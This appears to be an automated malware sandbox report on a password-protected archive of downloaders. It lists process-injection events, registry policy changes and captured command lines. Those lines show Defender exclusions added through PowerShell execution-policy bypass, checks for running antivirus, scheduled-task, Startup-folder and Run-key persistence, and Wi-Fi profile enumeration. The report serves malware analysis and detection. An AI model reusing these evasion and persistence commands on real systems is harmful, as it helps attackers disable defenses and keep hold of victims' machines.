PID 5032 wrote to memory of 1204 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
PID 5032 wrote to memory of 1204 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
PID 5032 wrote to memory of 2376 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
PID 5032 wrote to memory of 2376 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
PID 5032 wrote to memory of 2376 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
PID 5032 wrote to memory of 1956 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe
PID 5032 wrote to memory of 1956 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe
PID 1956 wrote to memory of 4936 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4936 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5032 wrote to memory of 2864 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
PID 5032 wrote to memory of 2864 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
PID 5032 wrote to memory of 2864 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
PID 3496 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
PID 3496 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
PID 3496 wrote to memory of 3828 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
PID 3828 wrote to memory of 1284 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
PID 3828 wrote to memory of 1284 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
PID 3828 wrote to memory of 1284 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
PID 1956 wrote to memory of 4732 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4732 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
PID 1284 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
PID 1284 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
PID 1956 wrote to memory of 2632 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 2632 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 560 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 560 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3496 wrote to memory of 4760 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
PID 3496 wrote to memory of 4760 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
PID 3496 wrote to memory of 4760 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
PID 3496 wrote to memory of 2148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
PID 3496 wrote to memory of 2148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
PID 3496 wrote to memory of 2148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2148 wrote to memory of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 3496 wrote to memory of 3148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
PID 3496 wrote to memory of 3148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
PID 3496 wrote to memory of 3148 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
PID 3148 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe C:\Windows\SysWOW64\cmd.exe
PID 3148 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe C:\Windows\SysWOW64\cmd.exe
PID 3148 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 4368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1876 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1876 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe'

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"

C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp

"C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp" /SL5="$10446,3312183,56832,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'

C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe

"C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe" -i

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 33988

C:\Windows\SysWOW64\findstr.exe

findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w

C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com

Paintball.com w

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

